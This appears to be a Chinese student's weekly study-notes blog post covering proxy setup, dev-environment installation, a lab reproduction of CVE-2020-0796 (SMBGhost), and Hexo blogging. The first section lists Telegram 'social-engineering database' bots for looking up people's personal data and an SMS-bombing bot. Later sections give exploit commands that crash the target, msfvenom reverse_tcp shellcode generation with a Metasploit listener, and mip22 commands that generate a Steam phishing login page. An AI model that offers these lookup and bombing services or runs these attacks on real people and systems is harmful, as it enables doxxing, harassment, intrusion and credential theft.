<!DOCTYPE html>


<html lang="en">
  

    <head>
      <meta charset="utf-8" />
        
      <meta
        name="viewport"
        content="width=device-width, initial-scale=1, maximum-scale=1"
      />
      <title>第一周 |  Hexo</title>
  <meta name="generator" content="hexo-theme-ayer">
      
      <link rel="shortcut icon" href="/favicon.ico" />
       
<link rel="stylesheet" href="/dist/main.css">

      
<link rel="stylesheet" href="/css/fonts/remixicon.css">

      
<link rel="stylesheet" href="/css/custom.css">
 
      <script src="https://cdn.staticfile.org/pace/1.2.4/pace.min.js"></script>
       
 

      <link
        rel="stylesheet"
        href="https://cdn.jsdelivr.net/npm/@sweetalert2/theme-bulma@5.0.1/bulma.min.css"
      />
      <script src="https://cdn.jsdelivr.net/npm/sweetalert2@11.0.19/dist/sweetalert2.min.js"></script>

      <!-- mermaid -->
      
      <style>
        .swal2-styled.swal2-confirm {
          font-size: 1.6rem;
        }
      </style>
    </head>
  </html>
</html>


<body>
  <div id="app">
    
      
    <main class="content on">
      <section class="outer">
  <article
  id="post-第一周"
  class="article article-type-post"
  itemscope
  itemprop="blogPost"
  data-scroll-reveal
>
  <div class="article-inner">
    
    <header class="article-header">
       
<h1 class="article-title sea-center" style="border-left:0" itemprop="name">
  第一周
</h1>
 

      
    </header>
     
    <div class="article-meta">
      <a href="/2023/12/02/%E7%AC%AC%E4%B8%80%E5%91%A8/" class="article-date">
  <time datetime="2023-12-02T06:58:54.000Z" itemprop="datePublished">2023-12-02</time>
</a>   
<div class="word_count">
    <span class="post-time">
        <span class="post-meta-item-icon">
            <i class="ri-quill-pen-line"></i>
            <span class="post-meta-item-text"> Word count:</span>
            <span class="post-count">3.9k</span>
        </span>
    </span>

    <span class="post-time">
        &nbsp; | &nbsp;
        <span class="post-meta-item-icon">
            <i class="ri-book-open-line"></i>
            <span class="post-meta-item-text"> Reading time≈</span>
            <span class="post-count">15 min</span>
        </span>
    </span>
</div>
 
    </div>
      
    <div class="tocbot"></div>




  
    <div class="article-entry" itemprop="articleBody">
       
  <h1 id="一、代理（27）"><a href="#一、代理（27）" class="headerlink" title="一、代理（27）"></a>一、代理（27）</h1><h2 id="程序安装"><a href="#程序安装" class="headerlink" title="程序安装"></a>程序安装</h2><h3 id="1-clash安装"><a href="#1-clash安装" class="headerlink" title="1. 	clash安装"></a>1. 	clash安装</h3><p>下载clash安装包压缩文件，解压安装</p>
<p><img src="https://cdn.jsdelivr.net/gh/WEIYV7/image@main//imgimage-20231202185358625.png" alt="image-20231202185358625"></p>
<p>加载代理链接——<a target="_blank" rel="noopener" href="https://sub2.smallstrawberry.com/api/v1/client/subscribe?token=rjx33i16s72y0a0uns07c4cvui6hju51">一元机场</a></p>
<p><img src="https://cdn.jsdelivr.net/gh/WEIYV7/image@main//imgimage-20231202175545393.png" alt="image-20231202175545393"></p>
<p>打开代理，进行代理连接，从而可以打开国外网站</p>
<p><img src="https://cdn.jsdelivr.net/gh/WEIYV7/image@main//imgimage-20231202170708308.png"></p>
<h3 id="2-telegram社工库加载"><a href="#2-telegram社工库加载" class="headerlink" title="2.	telegram社工库加载"></a>2.	telegram社工库加载</h3><p>下载并安装telegram软件，并打开进行短信验证登录</p>
<p><img src="https://cdn.jsdelivr.net/gh/WEIYV7/image@main//imgimage-20231202172022357.png"></p>
<p>由于在国内手机号码接收困难，可以通过第三方平台（<a target="_blank" rel="noopener" href="https://sms-activate.org/cn/freeNumbers#nnuumm">sms-activate</a>）产生国外虚拟号码验证登录</p>
<p><img src="https://cdn.jsdelivr.net/gh/WEIYV7/image@main//imgimage-20231202172810516.png"></p>
<p>登入后加载社工库进行社工查询</p>
<p>社工库：</p>
<p><a target="_blank" rel="noopener" href="https://t.me/yuehanbot?start=51405355580f2a7">https://t.me/yuehanbot?start=51405355580f2a7</a><br><a target="_blank" rel="noopener" href="https://t.me/DATA_007bot?start=CNSlE5un5l">https://t.me/DATA_007bot?start=CNSlE5un5l</a><br><a target="_blank" rel="noopener" href="https://t.me/AJL01_bot?start=zsXK6jaPPc">https://t.me/AJL01_bot?start=zsXK6jaPPc</a><br><a target="_blank" rel="noopener" href="https://t.me/PyramidNetBot?start=rGz5effDSf">https://t.me/PyramidNetBot?start=rGz5effDSf</a><br><a target="_blank" rel="noopener" href="https://t.me/pingansgk_bot?start=XGq3xbIuPUuv">https://t.me/pingansgk_bot?start=XGq3xbIuPUuv</a><br><a target="_blank" rel="noopener" href="https://t.me/HePingSGKbot?start=xbVQNWB">https://t.me/HePingSGKbot?start=xbVQNWB</a><br><a target="_blank" rel="noopener" href="https://t.me/BeSGKbot?start=s4QUyy0">https://t.me/BeSGKbot?start=s4QUyy0</a><br><a target="_blank" rel="noopener" href="https://t.me/HaHosgk3_bot?start=QZPXQHQQQW">https://t.me/HaHosgk3_bot?start=QZPXQHQQQW</a></p>
<p><a target="_blank" rel="noopener" href="https://t.me/qingfeng888bot?start=5140535558">https://t.me/qingfeng888bot?start=5140535558</a>	（短信轰炸）</p>
<h1 id="二、环境搭建与永恒之黑漏洞（28）"><a href="#二、环境搭建与永恒之黑漏洞（28）" class="headerlink" title="二、环境搭建与永恒之黑漏洞（28）"></a>二、环境搭建与永恒之黑漏洞（28）</h1><h2 id="1-JDK环境搭建"><a href="#1-JDK环境搭建" class="headerlink" title="1.	JDK环境搭建"></a>1.	JDK环境搭建</h2><h3 id="1-1JDK环境安装"><a href="#1-1JDK环境安装" class="headerlink" title="1.1	JDK环境安装"></a>1.1	JDK环境安装</h3><p>进入<a target="_blank" rel="noopener" href="https://www.oracle.com/java/technologies/downloads/">JDK下载官网</a>之后，首页出现的是目前最新的JDK版本，也可选择常用的jdk8</p>
<p><img src="https://cdn.jsdelivr.net/gh/WEIYV7/image@main//imgimage-20231202180636191.png" alt="image-20231202180636191"></p>
<p> 如果需要下载以前的JDK版本，就需要点击【Java archive】， 在这里就可以找到JDK之前的所有版本</p>
<p><img src="https://cdn.jsdelivr.net/gh/WEIYV7/image@main//imgimage-20231202180828048.png" alt="image-20231202180828048"></p>
<p>选择好自己所需要的JDK版本之后，选择和操作系统一致版本的JDK，下载解压后安装，进行下一步即可</p>
<h3 id="1-2JDK环境变量"><a href="#1-2JDK环境变量" class="headerlink" title="1.2	JDK环境变量"></a>1.2	JDK环境变量</h3><p>​	完成jdk安装以后则需对，配置PATH环境变量的目的是，能够在任何地方使用编译工具（javac）和运行工具（java）。PATH环境变量</p>
<p>的值就应该是javac和java工具所在的目录路径，即JDK bin目录</p>
<p>打开系统中的高级系统设置，点开高级，然后进入环境变量</p>
<p><img src="https://cdn.jsdelivr.net/gh/WEIYV7/image@main//imgimage-20231202181513481.png" alt="image-20231202181513481"></p>
<p> 选择下面的系统变量，进行新建  </p>
<p><img src="https://cdn.jsdelivr.net/gh/WEIYV7/image@main//imgimage-20231202181721244.png" alt="image-20231202181721244"></p>
<p>输入变量名JAVA_HOME，变量值根据自己的jdk的安装路径填写为JDK的bin目录所在路径。注意不用带bin，下面是笔者的安装目录</p>
<img src="https://cdn.jsdelivr.net/gh/WEIYV7/image@main//imgimage-20231202181755329.png" alt="image-20231202181755329"  />

<p>在系统变量里新建”classpath”变量，变量值为：.;%JAVA_HOME%\lib\dt.jar;%JAVA_HOME%\lib\tools.jar;</p>
<p><img src="https://cdn.jsdelivr.net/gh/WEIYV7/image@main//imgimage-20231202181902119.png" alt="image-20231202181902119"></p>
<p> 找到path变量（已存在不用新建）添加变量值：%JAVA_HOME%\bin;%JAVA_HOME%\jre\bin</p>
<p><img src="https://cdn.jsdelivr.net/gh/WEIYV7/image@main//imgimage-20231202182057881.png" alt="image-20231202182057881"></p>
<p>Windows+R&amp;-&gt;输入&amp;cmd&amp;-&gt;Enter，输入java -version(记得中间有个空格)，如果显示jdk版本信息就说明环境变量配置成功了</p>
<p><img src="https://cdn.jsdelivr.net/gh/WEIYV7/image@main//imgimage-20231202182226390.png" alt="image-20231202182226390"></p>
<h2 id="2-Python环境搭建"><a href="#2-Python环境搭建" class="headerlink" title="2.	Python环境搭建"></a>2.	Python环境搭建</h2><p>python是一个跨平台，可以在的编程语言，因此可在Windows，linux和mac os x系统中安装使用。安装完成后，你会得到python解释器</p>
<p>环境，可以通过终端输入python命令查看本地是否已经安装python已经python版本。这里有一个点需要注意的是，如果没有将python的</p>
<p>安装目录添加到环境变量中，会报错（python不是内部命令或外部命令，也不是可执行程序）。需要把python安装环境添加到环境变量</p>
<p>中。</p>
<h3 id="2-1Python下载与安装"><a href="#2-1Python下载与安装" class="headerlink" title="2.1	Python下载与安装"></a>2.1	Python下载与安装</h3><p>下载路径</p>
<p>python官网：<a target="_blank" rel="noopener" href="https://www.python.org/">https://www.python.org/</a></p>
<p>python文档地址：<a target="_blank" rel="noopener" href="https://www.python.org/doc/">https://www.python.org/doc/</a></p>
<p>进入<a target="_blank" rel="noopener" href="https://www.python.org/">官网</a>点击Downloads选择Windows</p>
<p><img src="https://cdn.jsdelivr.net/gh/WEIYV7/image@main//imgimage-20231202182856128.png" alt="image-20231202182856128"></p>
<p>下载自己所需python版本</p>
<p><img src="https://cdn.jsdelivr.net/gh/WEIYV7/image@main//imgimage-20231202183005057.png" alt="image-20231202183005057"></p>
<h3 id="2-2Python安装"><a href="#2-2Python安装" class="headerlink" title="2.2	Python安装"></a>2.2	Python安装</h3><p>下载完成后，找到安装包，双击打开点击运</p>
<p>勾选左下角Add python 3.6 to  PATH，然后选择第二个自定义安装（Customize installation）</p>
<p>以下默认即可，点击next（下一步）</p>
<p><img src="https://cdn.jsdelivr.net/gh/WEIYV7/image@main//imgimage-20231202183416571.png" alt="image-20231202183416571"></p>
<p>选择自定义安装路径</p>
<p><img src="https://cdn.jsdelivr.net/gh/WEIYV7/image@main//imgimage-20231202183459763.png" alt="image-20231202183459763"></p>
<p>等待进度条安装完毕即可</p>
<p>完成后，通过Win+R输入cmd进入命令行，输入python，即安装成功</p>
<p><img src="https://cdn.jsdelivr.net/gh/WEIYV7/image@main//imgimage-20231202183714914.png" alt="image-20231202183714914"></p>
<h3 id="2-3注意事项"><a href="#2-3注意事项" class="headerlink" title="2.3	注意事项"></a>2.3	注意事项</h3><p>1.安装路径不要有中文</p>
<p>2.一定要知道安装到了哪里</p>
<p>3.add python 3.6to PATH 自动添加到环境变量</p>
<p>4.mac系统自带python2，所以要需要通过python3进入交互环境</p>
<h2 id="3-Win10永恒之恒漏洞利用"><a href="#3-Win10永恒之恒漏洞利用" class="headerlink" title="3.	Win10永恒之恒漏洞利用"></a>3.	Win10永恒之恒漏洞利用</h2><h3 id="3-1复现环境"><a href="#3-1复现环境" class="headerlink" title="3.1	复现环境"></a>3.1	复现环境</h3><p>在VMware中安装虚拟机Windows 10系统和Kali系统，分别通过ipconfig、ifconfig命令获取各自的IP</p>
<p>靶机：windows10 1903 x64  ip：192.168.47.137（关闭防火墙）</p>
<p><img src="https://cdn.jsdelivr.net/gh/WEIYV7/image@main//imgimage-20231202191333816.png" alt="image-20231202191333816"></p>
<p>攻击机：kali  ip：192.168.47.131</p>
<p><img src="https://cdn.jsdelivr.net/gh/WEIYV7/image@main//imgimage-20231202191407953.png" alt="image-20231202191407953"></p>
<h3 id="3-2检测工具"><a href="#3-2检测工具" class="headerlink" title="3.2	检测工具"></a>3.2	检测工具</h3><p>1.在靶机里下载检测工具：<a target="_blank" rel="noopener" href="http://dl.qianxin.com/skylar6/CVE-2020-0796-Scanner.zip/">http://dl.qianxin.com/skylar6/CVE-2020-0796-Scanner.zip/</a></p>
<p>2.在cmd中运行检测工具，检测到漏洞风险</p>
<p><img src="https://cdn.jsdelivr.net/gh/WEIYV7/image@main//imgimage-20231202192545150.png" alt="image-20231202192545150"></p>
<h3 id="3-3漏洞利用"><a href="#3-3漏洞利用" class="headerlink" title="3.3	漏洞利用"></a>3.3	漏洞利用</h3><p>下载利用工具CVE-2020-0796-PoC-master，解压在攻击机Kali中</p>
<p>在攻击机Kali解压后文件夹终端中以root权限输入以下命令</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">pip install ntlm_auth</span><br><span class="line">pip install smbclient</span><br><span class="line">python3 CVE-2020-0796.py 192.168.47.137</span><br></pre></td></tr></table></figure>

<p>之后攻击成功，在靶机中会出现蓝屏</p>
<p><img src="https://cdn.jsdelivr.net/gh/WEIYV7/image@main//imgimage-20231202194344517.png" alt="image-20231202194344517"></p>
<h1 id="三、CVE-2020-0796漏洞与steam钓鱼网站（29）"><a href="#三、CVE-2020-0796漏洞与steam钓鱼网站（29）" class="headerlink" title="三、CVE-2020-0796漏洞与steam钓鱼网站（29）"></a>三、CVE-2020-0796漏洞与steam钓鱼网站（29）</h1><h2 id="1-CVE-2020-0796漏洞利用"><a href="#1-CVE-2020-0796漏洞利用" class="headerlink" title="1.	CVE-2020-0796漏洞利用"></a>1.	CVE-2020-0796漏洞利用</h2><p>通过CVE-2020-0796-Scanner工具检查后，下载另一个漏洞利用工具SMBGhost_RCE_PoC-master</p>
<p>下载工具解压在攻击机Kali中，通过工具中的exploit.py文件来攻击</p>
<p>下载利用工具：<a target="_blank" rel="noopener" href="https://github.com/chompie1337/SMBGhost_RCE_PoC">https://github.com/chompie1337/SMBGhost_RCE_PoC</a></p>
<h3 id="1-1在kali中利用MSF生成木马："><a href="#1-1在kali中利用MSF生成木马：" class="headerlink" title="1.1	在kali中利用MSF生成木马："></a>1.1	在kali中利用MSF生成木马：</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">msfvenom -p windows/x64/meterpreter/reverse_tcp LPORT=6789 -b &#x27;\x00&#x27; -i 1 -f python </span><br><span class="line"></span><br><span class="line">// -p windows/x64/meterpreter/reverse_tcp 设置payload为windows64位meterpreter控制台下的反向连接</span><br><span class="line">//  LPORT=6789 设置监听端口为6789</span><br><span class="line">//  -b &#x27;\x00&#x27; 设置在生成的程序中避免出现&#x27;\x00&#x27;</span><br><span class="line">//  -i 1 设置编码次数为一次</span><br><span class="line">//  -f python 设置生成python格式文件</span><br></pre></td></tr></table></figure>

<p>用生成的shellcode将漏洞利用工具exploit.py文件中的一部分替换掉，直接复制粘贴，然后再将粘贴内容中的buf替换成USER_PAYLOAD</p>
<p>并保存</p>
<p><img src="https://cdn.jsdelivr.net/gh/WEIYV7/image@main//imgimage-20231202200036760.png" alt="image-20231202200036760"></p>
<h3 id="1-2开启监听模式"><a href="#1-2开启监听模式" class="headerlink" title="1.2	开启监听模式"></a>1.2	开启监听模式</h3><p>将漏洞利用工具SMBGhost_RCE_PoC-master整个文件夹放入kali里，运行利用工具</p>
<p><code>python3 exploit.py -ip 192.168.47.133</code></p>
<p><img src="https://cdn.jsdelivr.net/gh/WEIYV7/image@main//imgimage-20231202215609360.png" alt="image-20231202215609360"></p>
<p>接着攻击成功Win10系统会出现蓝屏</p>
<p><img src="https://cdn.jsdelivr.net/gh/WEIYV7/image@main//imgimage-20231202214102210.png" alt="image-20231202214102210"></p>
<p>重新打开一个窗口配置msf并进行监听</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">msfconsole</span><br><span class="line">use exploit/multi/handler </span><br><span class="line">set payload windows/x64/meterpreter/reverse_tcp</span><br><span class="line">set rhost 靶机IP</span><br><span class="line">set lport 6789	生成木马时设置的端口</span><br><span class="line">run</span><br></pre></td></tr></table></figure>

<p>该漏洞反弹shell具有概率性，如果单次未成功请重复一下步骤，或者重新开始</p>
<p><img src="https://cdn.jsdelivr.net/gh/WEIYV7/image@main//imgimage-20231202214505132.png" alt="image-20231202214505132"></p>
<p>bind_tcp</p>
<p>path : payload&#x2F;windows&#x2F;meterpreter&#x2F;bind_tcp</p>
<p>正向连接shell，因为在内网跨网段时无法连接到attack的机器，所以在内网中经常会使用，不需要设置LHOST</p>
<p>reverse_tcp</p>
<p>path : payload&#x2F;windows&#x2F;meterpreter&#x2F;reverse_tcp</p>
<p>反向连接shell,使用起来很稳定。需要设置LHOST</p>
<p>reverse_http&#x2F;https</p>
<p>path:payload&#x2F;windows&#x2F;meterpreter&#x2F;reverse_http&#x2F;https</p>
<p>通过http&#x2F;https的方式反向连接，在网速慢的情况下不稳定，https如果反弹没有收到数据，可以将监听端口换成443试试</p>
<h2 id="2-steam钓鱼网站"><a href="#2-steam钓鱼网站" class="headerlink" title="2.	steam钓鱼网站"></a>2.	steam钓鱼网站</h2><h3 id="2-1mip22安装"><a href="#2-1mip22安装" class="headerlink" title="2.1	mip22安装"></a>2.1	mip22安装</h3><p>打开Kali的root权限终端，输入<code>vim /etc/proxychains4.conf</code>编辑代理设置</p>
<p><img src="https://cdn.jsdelivr.net/gh/WEIYV7/image@main//imgimage-20231202222745101.png" alt="image-20231202222745101"></p>
<p>端口号为代理端口号7890</p>
<p><img src="https://cdn.jsdelivr.net/gh/WEIYV7/image@main//imgimage-20231202222853741.png" alt="image-20231202222853741"></p>
<p>下载mip22工具</p>
<p><code>proxychains4 git clone https://github.com/makdosx/mip22</code></p>
<p><img src="https://cdn.jsdelivr.net/gh/WEIYV7/image@main//imgimage-20231202223150884.png" alt="image-20231202223150884"></p>
<h3 id="2-2mip22生成钓鱼网页"><a href="#2-2mip22生成钓鱼网页" class="headerlink" title="2.2	mip22生成钓鱼网页"></a>2.2	mip22生成钓鱼网页</h3><p>更改mip22工具为可执行权限，并打开mip22工具</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">chmod -R 777 mip22</span><br><span class="line">cd mip22</span><br><span class="line">proxychains4 bash mip22.sh</span><br></pre></td></tr></table></figure>

<p>依照自己生成的网页，按步骤执行</p>
<p><img src="https://cdn.jsdelivr.net/gh/WEIYV7/image@main//imgimage-20231202224122589.png" alt="image-20231202224122589"></p>
<p>生成steam钓鱼网站登录界面</p>
<img src="https://cdn.jsdelivr.net/gh/WEIYV7/image@main//imgimage-20231202224251012.png" alt="image-20231202224251012" style="zoom:80%;" />

<h1 id="四、Hexo博客搭建（30）"><a href="#四、Hexo博客搭建（30）" class="headerlink" title="四、Hexo博客搭建（30）"></a>四、Hexo博客搭建（30）</h1><h2 id="1-环境搭建"><a href="#1-环境搭建" class="headerlink" title="1.	环境搭建"></a>1.	环境搭建</h2><h3 id="1-1hexo文件创建"><a href="#1-1hexo文件创建" class="headerlink" title="1.1	hexo文件创建"></a>1.1	hexo文件创建</h3><p>下载git和node软件，并解压安装</p>
<p>注册一个github一个账号，用户名为WEIYV7</p>
<p>创建一blog文件夹，并在文件内右键打开Open Git Bash here</p>
<p><img src="https://cdn.jsdelivr.net/gh/WEIYV7/image@main//imgimage-20231203141253533.png" alt="image-20231203141253533"></p>
<p>输入以下命令创建hexo博客文件</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">npm install -g hexo-cli</span><br><span class="line">hexo init blog</span><br><span class="line">cd blog</span><br><span class="line">hexo g</span><br><span class="line">hexo s</span><br></pre></td></tr></table></figure>

<p><img src="https://cdn.jsdelivr.net/gh/WEIYV7/image@main//imgimage-20231203141747478.png" alt="image-20231203141747478"></p>
<p>再接着清除hexo创建缓存并运行</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">hexo clean</span><br><span class="line">cd ~/.ssh</span><br></pre></td></tr></table></figure>

<p><img src="https://cdn.jsdelivr.net/gh/WEIYV7/image@main//imgimage-20231203142202907.png" alt="image-20231203142202907"></p>
<h3 id="1-2hexo文件与github链接"><a href="#1-2hexo文件与github链接" class="headerlink" title="1.2	hexo文件与github链接"></a>1.2	hexo文件与github链接</h3><p>在创建的hexo博客文件中打开Open Git Bash here，发表hexo博客界面</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">ssh-keygen -t rsa -C “邮件地址”</span><br><span class="line">ssh -T git@github.com</span><br><span class="line">npm install hexo-deployer-git –save</span><br><span class="line">git config –global user.name “xxx”				// 你的github用户名，非昵称</span><br><span class="line">git config –global user.email “xxx@qq.com“		// 填写你的github注册邮箱</span><br><span class="line">hexo d -g</span><br></pre></td></tr></table></figure>

<p><img src="https://cdn.jsdelivr.net/gh/WEIYV7/image@main//imgimage-20231203143247768.png" alt="image-20231203143247768"></p>
<p>在github中创建hexo博客库</p>
<p><img src="https://cdn.jsdelivr.net/gh/WEIYV7/image@main//imgimage-20231203143914566.png" alt="image-20231203143914566"></p>
<p>保存后配置文件_config.yml</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">deploy:</span><br><span class="line">	type: git</span><br><span class="line">	repository: git@github.com:WEIYV7/WEIYV7.github.io.git</span><br><span class="line">	branch: main</span><br></pre></td></tr></table></figure>

<p>打开博客界面：	WEIYV7.github.io</p>
<p><img src="https://cdn.jsdelivr.net/gh/WEIYV7/image@main//imgimage-20231203145122249.png" alt="image-20231203145122249"></p>
<h2 id="2-typora-图床搭建"><a href="#2-typora-图床搭建" class="headerlink" title="2.	typora+图床搭建"></a>2.	typora+图床搭建</h2><h3 id="2-1创建image库"><a href="#2-1创建image库" class="headerlink" title="2.1	创建image库"></a>2.1	创建image库</h3><p>下载解压并安装typora与PicGo软件</p>
<p>安装步骤创建github的image库，并将产生的密钥token复制</p>
<p><img src="https://cdn.jsdelivr.net/gh/WEIYV7/image@main//imgimage-20231203145052401.png" alt="image-20231203145052401"></p>
<p><img src="https://cdn.jsdelivr.net/gh/WEIYV7/image@main//imgimage-20231203145211113.png" alt="image-20231203145211113"></p>
<p><img src="https://cdn.jsdelivr.net/gh/WEIYV7/image@main//imgimage-20231203145240354.png" alt="image-20231203145240354"></p>
<h3 id="2-2PicGo与image库链接"><a href="#2-2PicGo与image库链接" class="headerlink" title="2.2	PicGo与image库链接"></a>2.2	PicGo与image库链接</h3><p>打开PicGo图床设置——github，编辑图床设置并将此图床设为默认图床</p>
<p>将复制的token放入设定token中，自定义域名为：<code>https://cdn.jsdelivr.net/gh/你的github用户名/你的仓库名@分支（一般为main）/</code></p>
<p><img src="https://cdn.jsdelivr.net/gh/WEIYV7/image@main//imgimage-20231203145953680.png" alt="image-20231203145953680"></p>
<h3 id="2-3typora与PicGo链接"><a href="#2-3typora与PicGo链接" class="headerlink" title="2.3	typora与PicGo链接"></a>2.3	typora与PicGo链接</h3><p>打开typora，在文件选项中点击偏好设置</p>
<p><img src="https://cdn.jsdelivr.net/gh/WEIYV7/image@main//imgimage-20231203150553337.png" alt="image-20231203150553337"></p>
<p>设置Markdown，选择PicGo路径</p>
<p><img src="https://cdn.jsdelivr.net/gh/WEIYV7/image@main//imgimage-20231203150705024.png" alt="image-20231203150705024"></p>
<p>进行验证图片上传选项，验证成功即可</p>
<p><img src="https://cdn.jsdelivr.net/gh/WEIYV7/image@main//imgimage-20231203150934774.png" alt="image-20231203150934774"></p>
<h2 id="3-Hexo博客内容与主题编辑"><a href="#3-Hexo博客内容与主题编辑" class="headerlink" title="3.	Hexo博客内容与主题编辑"></a>3.	Hexo博客内容与主题编辑</h2><h3 id="3-1Hexo文件"><a href="#3-1Hexo文件" class="headerlink" title="3.1	Hexo文件"></a>3.1	Hexo文件</h3><p>写文章、发布文章</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br></pre></td><td class="code"><pre><span class="line"># 开启服务</span><br><span class="line">hexo server</span><br><span class="line"></span><br><span class="line"># 新建文章</span><br><span class="line">hexo new a</span><br><span class="line"></span><br><span class="line"># 新建草稿b</span><br><span class="line">hexo new draft b</span><br><span class="line"></span><br><span class="line"># 将草稿b成为文章</span><br><span class="line">hexo publish b</span><br><span class="line"></span><br><span class="line"># 发布页面c</span><br><span class="line">hexo new page c</span><br><span class="line"></span><br><span class="line"># 生成静态文章</span><br><span class="line">hexo generate 或者是 hexo g</span><br><span class="line"></span><br><span class="line"># 部署文章</span><br><span class="line">hexo deploy 或者是 hexo d</span><br></pre></td></tr></table></figure>

<p>Hexo相关目录文件</p>
<p>node_modules是node.js各种库的目录，public是生成的网页文件目录，scaffolds里面就三个文件，存储着新文章和新页面的初始设置，</p>
<p>source是我们最常用到的一个目录，里面存放着文章、各类页面、图像等文件，themes存放着主题文件</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line">- node_modules</span><br><span class="line">- public</span><br><span class="line">- scaffolds</span><br><span class="line">- source</span><br><span class="line">    - _data</span><br><span class="line">    - _posts</span><br><span class="line">    - about</span><br><span class="line">    - archives</span><br><span class="line">    - categories</span><br><span class="line">    - friends</span><br><span class="line">    - tags</span><br><span class="line">- themes</span><br></pre></td></tr></table></figure>

<p>特定目录新建文章</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">/source目录下</span><br><span class="line">#创建文件：/source/_posts/test.md</span><br><span class="line">$ hexo new post test</span><br><span class="line"></span><br><span class="line">#创建文件： source/_posts/about/me.md  （在source目录下创建子目录）</span><br><span class="line">$ hexo new page --path about/me </span><br><span class="line"></span><br><span class="line">在网站根目录下</span><br><span class="line">#创建文件： /source/about/me.md  （在根目录下）</span><br><span class="line">$ hexo new page --path about/me &quot;About me&quot;</span><br></pre></td></tr></table></figure>

<p>文章首部标签</p>
<p><img src="https://cdn.jsdelivr.net/gh/WEIYV7/image@main//imgimage-20231203152008826.png" alt="image-20231203152008826"></p>
<p>基于Hexo和Butterfly创建个人技术博客：<a target="_blank" rel="noopener" href="https://blog.csdn.net/liudonglovehemin/article/details/131087757">https://blog.csdn.net/liudonglovehemin/article/details/131087757</a></p>
<h3 id="3-2markdown语法"><a href="#3-2markdown语法" class="headerlink" title="3.2	markdown语法"></a>3.2	markdown语法</h3><h4 id="标题"><a href="#标题" class="headerlink" title="标题"></a>标题</h4><p>使用 # 号可表示 1-6 级标题，一级标题对应一个 # 号，二级标题对应两个 # 号，以此类推</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"># 一级标题</span><br><span class="line">## 二级标题</span><br><span class="line">### 三级标题</span><br><span class="line">#### 四级标题</span><br><span class="line">##### 五级标题</span><br><span class="line">###### 六级标题</span><br></pre></td></tr></table></figure>

<h4 id="字体样式"><a href="#字体样式" class="headerlink" title="字体样式"></a>字体样式</h4><p>Markdown 可以使用以下几种字体：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">*斜体文本*</span><br><span class="line">_斜体文本_</span><br><span class="line">**粗体文本**</span><br><span class="line">__粗体文本__</span><br><span class="line">***粗斜体文本***</span><br><span class="line">___粗斜体文本___</span><br></pre></td></tr></table></figure>

<h4 id="分隔线"><a href="#分隔线" class="headerlink" title="分隔线"></a>分隔线</h4><p>你可以在一行中用三个以上的星号、减号、底线来建立一个分隔线，行内不能有其他东西。你也可以在星号或是减号中间插入空格。下面每种写法都可以建立分隔线：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">***</span><br><span class="line">* * *</span><br><span class="line">*****</span><br><span class="line">- - -</span><br><span class="line">----------</span><br></pre></td></tr></table></figure>

<h4 id="删除线"><a href="#删除线" class="headerlink" title="删除线"></a>删除线</h4><p>如果段落上的文字要添加删除线，只需要在文字的两端加上两个波浪线 ~~ 即可，实例如下：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">RUNOOB.COM</span><br><span class="line">GOOGLE.COM</span><br><span class="line">~~BAIDU.COM~~</span><br></pre></td></tr></table></figure>

